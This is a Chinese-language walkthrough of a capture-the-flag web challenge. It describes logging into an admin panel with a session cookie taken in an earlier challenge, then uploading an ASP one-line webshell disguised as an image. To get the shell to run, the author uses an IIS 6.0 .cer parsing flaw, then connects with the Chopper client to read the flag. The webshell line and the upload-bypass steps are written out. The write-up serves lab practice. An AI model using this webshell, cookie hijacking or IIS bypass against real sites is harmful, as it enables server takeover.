看了题目和Tips,这题是需要我们用上一题窃取的cookie来登录后台然后上传WEBSHELL,然后连接菜刀获取flag。
先找到上一题打来的cookie。
ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
然后按F12选择Application,然后看右边有一个cookies然后选择我们的题目的地址,然后点击空白的地方,
把ADMINSESSIONIDCSTRCSDQ粘贴在Name下LBMLMBCCNPFINOANFGLPCFBC粘贴在value
(浏览器可能会有差异,我是谷歌浏览器,不懂可以百度下非常简单)
然后点准备好了吗或者F5刷新页面,成功进入
然后我们直接找上传点,毕竟getshell我们是需要在服务器的WWW文件夹里面放一段恶意代码的。
我们先去百度找ASP一句话木马,因为是ASP的环境
ASP一句话木马:<%eval request ("pass")%> 密码是pass eval是个函数,request是接受参数的。有兴趣了解一句话的可以自行百度或者私聊我。
一般而言直接传木马文件都很可能被拦截,所以一般而言一句话木马都会做成图片马。图片马制作非常简单,一条CMD命令就可以了
具体的可以去https://jlasp.com/zhishiwendang/3_385.html 查看 然后我们成功的得到了图片马
找到上传点
我们修改产品管理里面的产品
文件存在然后上菜刀。菜刀打开右键添加,地址就写文件地址,边上的框框写密码,我的就是pass,记得选择脚本格式
然后我们双击去访问,丢了一个405报错。这是因为jpg文件不解析,因为你的后缀是图片格式,所以服务器会当做一张图片去读取,而不是代码。
就和你把一个图片后缀改为TXT然后打开里面的东西都会当文本读取而不是图片。
报错信息里面写了iis6.0的中间件。百度下iis6.0的解析漏洞,就能发现上传cer文件,iis6.0会解且执行。
然后把图片马名字改为cer上传,成功上传,然后菜刀连接,成功进入,然后滚轮划一下就能看到flag!.txt,然后双击打开就是flag了。
吉公网安备 22020202000301号